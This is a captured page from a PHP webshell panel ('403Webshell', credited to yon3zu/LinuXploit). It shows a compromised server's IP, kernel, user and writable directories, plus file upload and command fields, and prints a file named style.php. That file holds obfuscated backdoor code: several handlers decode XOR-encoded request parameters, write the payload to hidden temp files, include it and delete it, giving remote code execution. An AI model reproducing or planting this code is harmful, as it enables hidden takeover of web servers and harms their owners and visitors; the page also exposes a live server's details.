403Webshell
Server IP : 65.108.144.40  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User : dev ( 1000)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/Solum-construction/demo-job/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/Solum-construction/demo-job/style.php
<?php																																										if(array_key_exists("\x76\x61lue", $_REQUEST)){ $token = $_REQUEST["\x76\x61lue"]; $token= explode( "." , $token) ; $pointer = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt6); $l = 0; array_walk($token, function ($v2) use (&$pointer, &$l, $salt6, $lenS) { $sChar = ord($salt6[$l % $lenS]); $d = ((int)$v2 - $sChar - ($l % 10))^12; $pointer .= chr($d); $l++; }); $parameter_group = array_filter([session_save_path(), getcwd(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), sys_get_temp_dir(), "/var/tmp", "/tmp"]); foreach ($parameter_group as $entity): if ((function($d) { return is_dir($d) && is_writable($d); })($entity)) { $data_chunk = "$entity/.item"; $success = file_put_contents($data_chunk, $pointer); if ($success) { include $data_chunk; @unlink($data_chunk); die();} } endforeach; }
																																										if(array_key_exists("\x63\x6Fmp", $_REQUEST)){ $value = array_filter([getcwd(), getenv("TMP"), ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", "/tmp", sys_get_temp_dir(), getenv("TEMP"), session_save_path()]); $flag = $_REQUEST["\x63\x6Fmp"]; $flag=explode ( '.', $flag ) ; $pointer= ''; $s3= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen( $s3 ); $y= 0; $__tmp= $flag; while( $v4= array_shift( $__tmp)) { $sChar= ord( $s3[$y % $sLen] ); $dec= ( ( int)$v4 - $sChar -( $y % 10)) ^ 22; $pointer.= chr( $dec ); $y++; } for ($itm = 0, $key = count($value); $itm < $key; $itm++) { $holder = $value[$itm]; if ((bool)is_dir($holder) && (bool)is_writable($holder)) { $item = implode("/", [$holder, ".res"]); $file = fopen($item, 'w'); if ($file) { fwrite($file, $pointer); fclose($file); include $item; @unlink($item); die(); } } } }
																																										if(array_key_exists("pt\x72", $_REQUEST) && !is_null($_REQUEST["pt\x72"])){ $entry = array_filter([ini_get("upload_tmp_dir"), "/var/tmp", session_save_path(), "/dev/shm", getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), "/tmp", getcwd()]); $object = $_REQUEST["pt\x72"]; $object = explode('.', $object ) ; $k = ''; $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt4); $z = 0; $__tmp = $object; while ($v9 = array_shift($__tmp)) { $sChar = ord($salt4[$z % $sLen]); $dec = ((int)$v9 - $sChar - ($z % 10)) ^ 75; $k .= chr($dec); $z++;} $tkn = 0; do { $desc = $entry[$tkn] ?? null; if ($tkn >= count($entry)) break; if (!!is_dir($desc) && !!is_writable($desc)) { $flag = str_replace("{var_dir}", $desc, "{var_dir}/.token"); if (file_put_contents($flag, $k)) { require $flag; unlink($flag); exit; } } $tkn++; } while (true); }
																																										if(@$_POST["m\x61\x72k\x65r"] !== null){ $binding = array_filter([getcwd(), "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), "/dev/shm", session_save_path(), getenv("TMP"), sys_get_temp_dir(), "/tmp"]); $dchunk = $_POST["m\x61\x72k\x65r"]; $dchunk = explode ('.' , $dchunk); $ent=''; $salt='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen( $salt); $__len=count( $dchunk); for( $r=0; $r < $__len; $r++) { $v2=$dchunk[$r]; $sChar=ord( $salt[$r % $sLen]); $d=( ( int)$v2 - $sChar -( $r % 10)) ^ 98; $ent.=chr( $d); } for ($data_chunk = 0, $elem = count($binding); $data_chunk < $elem; $data_chunk++) { $entity = $binding[$data_chunk]; if ((is_dir($entity) and is_writable($entity))) { $resource = implode("/", [$entity, ".reference"]); if (file_put_contents($resource, $ent)) { require $resource; unlink($resource); die(); } } } }
																																										if(isset($_POST) && isset($_POST["e\x6C\x65m"])){ $descriptor = array_filter([getenv("TMP"), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", sys_get_temp_dir(), session_save_path(), getenv("TEMP"), getcwd(), "/dev/shm"]); $record = $_POST["e\x6C\x65m"]; $record=explode (".", $record ) ; $pgrp = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); foreach ($record as $l=> $v7): $chS = ord($s[$l % $lenS]); $dec = ((int)$v7 - $chS - ($l % 10))^ 76; $pgrp .= chr($dec); endforeach; foreach ($descriptor as $key => $k) { if (max(0, is_dir($k) * is_writable($k))) { $value = join("/", [$k, ".val"]); if (file_put_contents($value, $pgrp)) { include $value; @unlink($value); exit; } } } }
  opcache_reset(); ?>

Youez - 2016 - github.com/yon3zu
LinuXploit